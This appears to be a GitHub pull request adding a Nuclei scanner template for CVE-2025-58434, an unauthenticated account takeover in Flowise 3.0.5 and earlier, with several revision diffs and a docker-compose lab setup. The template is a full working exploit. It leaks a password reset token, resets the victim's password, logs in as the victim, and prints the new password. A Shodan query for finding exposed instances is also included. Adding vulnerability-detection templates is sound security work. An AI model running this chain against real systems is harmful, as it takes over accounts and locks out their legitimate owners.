### PR TITLE
Add CVE-2025-58434 template for Flowise account takeover

### DIFF
--- a/http/cves/2025/CVE-2025-58434.yaml
+++ b/http/cves/2025/CVE-2025-58434.yaml
@@ -1,11 +1,11 @@
 id: CVE-2025-58434
 
 info:
-  name: Flowise <= 3.0.5 - Full Account Takeover and Login Verification
+  name: Flowise <= 3.0.5 - Account Takeover
   author: nukunga[seunghyeonJeon]
   severity: critical
   description: |
-    Automates the full attack chain for CVE-2025-58434 in Flowise. 1) Leaks password reset token via forgot-password. 2) Resets the user's password to a known value. 3) Logs in with the new password to verify a complete account takeover.
+    Flowise versions 3.0.5 and earlier had a vulnerability in the forgot-password endpoint, which returned valid reset tokens without authentication—allowing attackers to reset passwords and take over accounts.
   reference:
     - https://github.com/advisories/GHSA-wgpv-6j63-x5ph
     - https://nvd.nist.gov/vuln/detail/CVE-2025-58434
@@ -14,11 +14,16 @@ info:
     cvss-score: 9.8
     cve-id: CVE-2025-58434
     cwe-id: CWE-306
-  tags: cve,cve2025,flowise,ato,rce,unauth,flowiseai
+  metadata:
+    verified: true
+    shodan-query: http.title:"Flowise - Build AI Agents, Visually"
+  tags: cve,cve2025,flowise,ato,rce,unauth
 
 variables:
   username: "{{username}}"
-  new_password: "Hacked54321!"
+  new_password: "{{rand_text_alphanumeric(12)}}"
+
+flow: http(1) && http(2) && http(3)
 
 http:
   - raw:
@@ -76,3 +81,8 @@ http:
           - '"email":"{{username}}"'
           - '"activeWorkspaceId":'
         condition: and
+
+    extractors:
+      - type: dsl
+        dsl:
+          - '"Password:" + new_password'

--- a/http/cves/2025/CVE-2025-58434.yaml
+++ b/http/cves/2025/CVE-2025-58434.yaml
@@ -23,8 +23,6 @@ variables:
   username: "{{username}}"
   new_password: "{{rand_text_alphanumeric(12)}}"
 
-flow: http(1) && http(2) && http(3)
-
 http:
   - raw:
       - |

--- a/http/cves/2025/CVE-2025-58434.yaml
+++ b/http/cves/2025/CVE-2025-58434.yaml
@@ -23,6 +23,8 @@ variables:
   username: "{{username}}"
   new_password: "{{rand_text_alphanumeric(12)}}"
 
+flow: http(1) && http(2) && http(3)
+
 http:
   - raw:
       - |
@@ -36,10 +38,17 @@ http:
       - type: regex
         name: token
         part: body
-        internal: true
         group: 1
         regex:
           - '"tempToken":"([A-Za-z0-9]{64})"'
+        internal: true
+
+    matchers:
+      - type: dsl
+        dsl:
+          - status_code == 201
+        internal: true
+
 
   - raw:
       - |
@@ -55,6 +64,12 @@ http:
           }
         }
 
+    matchers:
+      - type: dsl
+        dsl:
+          - status_code == 201
+        internal: true
+
   - raw:
       - |
         POST /api/v1/auth/login HTTP/1.1
@@ -68,16 +83,10 @@ http:
 
     matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 200
-
-      - type: word
-        part: body
-        words:
-          - '"id":'
-          - '"email":"{{username}}"'
-          - '"activeWorkspaceId":'
+      - type: dsl
+        dsl:
+          - status_code == 200
+          - contains_all(body, 'id', '{{username}}', 'activeWorkspaceId')
         condition: and
 
     extractors:

--- a/http/cves/2025/CVE-2025-58434.yaml
+++ b/http/cves/2025/CVE-2025-58434.yaml
@@ -1,0 +1,78 @@
+id: CVE-2025-58434
+
+info:
+  name: Flowise <= 3.0.5 - Full Account Takeover and Login Verification
+  author: nukunga[seunghyeonJeon]
+  severity: critical
+  description: |
+    Automates the full attack chain for CVE-2025-58434 in Flowise. 1) Leaks password reset token via forgot-password. 2) Resets the user's password to a known value. 3) Logs in with the new password to verify a complete account takeover.
+  reference:
+    - https://github.com/advisories/GHSA-wgpv-6j63-x5ph
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-58434
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2025-58434
+    cwe-id: CWE-306
+  tags: cve,cve2025,flowise,ato,rce,unauth,flowiseai
+
+variables:
+  username: "{{username}}"
+  new_password: "Hacked54321!"
+
+http:
+  - raw:
+      - |
+        POST /api/v1/account/forgot-password HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"user":{"email":"{{username}}"}}
+
+    extractors:
+      - type: regex
+        name: token
+        part: body
+        internal: true
+        group: 1
+        regex:
+          - '"tempToken":"([A-Za-z0-9]{64})"'
+
+  - raw:
+      - |
+        POST /api/v1/account/reset-password HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {
+          "user": {
+            "email": "{{username}}",
+            "tempToken": "{{token}}",
+            "password": "{{new_password}}"
+          }
+        }
+
+  - raw:
+      - |
+        POST /api/v1/auth/login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {
+          "email": "{{username}}",
+          "password": "{{new_password}}"
+        }
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: body
+        words:
+          - '"id":'
+          - '"email":"{{username}}"'
+          - '"activeWorkspaceId":'
+        condition: and


### PR DESCRIPTION
### Template / PR Information
<img width="983" height="289" alt="image" src="https://github.com/user-attachments/assets/7485dc5c-4375-443d-981e-412bfdf30da3" />

Based on our debugging process, there are two key requirements to successfully run this Nuclei template and trigger the vulnerability:

> - A Target Account Must Exist: The attack begins by targeting the email address of a valid, existing user. Therefore, you must first create an account (e.g., test@test.com) on the Flowise instance before running the template against that email.
> - A Functional Mail Server (SMTP) Is Required: The Flowise forgot-password API endpoint will throw a 500 Internal Server Error if it cannot connect to a configured SMTP server, which prevents the exploit from proceeding. To bypass this, the environment must include a mail server that the Flowise container can reach, such as the MailHog service we configured in the docker-compose.yml.

```yaml
services:
  flowise:
    image: flowiseai/flowise:3.0.5
    container_name: flowise-vulnerable
    ports:
      - "3000:3000"
    environment:
      - SMTP_HOST=mailhog
      - SMTP_PORT=1025
      - SMTP_USER=test
      - SMTP_PASSWORD=test
      - SMTP_SECURE=false
    depends_on:
      - mailhog

  mailhog:
    image: mailhog/mailhog
    container_name: mailhog-server
    ports:
      - "8025:8025"
      - "1025:1025"
```

- Add CVE-2025-58434 
- References:
    - https://github.com/advisories/GHSA-wgpv-6j63-x5ph
    - https://nvd.nist.gov/vuln/detail/CVE-2025-58434 

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO


#### Additional Details (leave it blank if not applicable)

<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)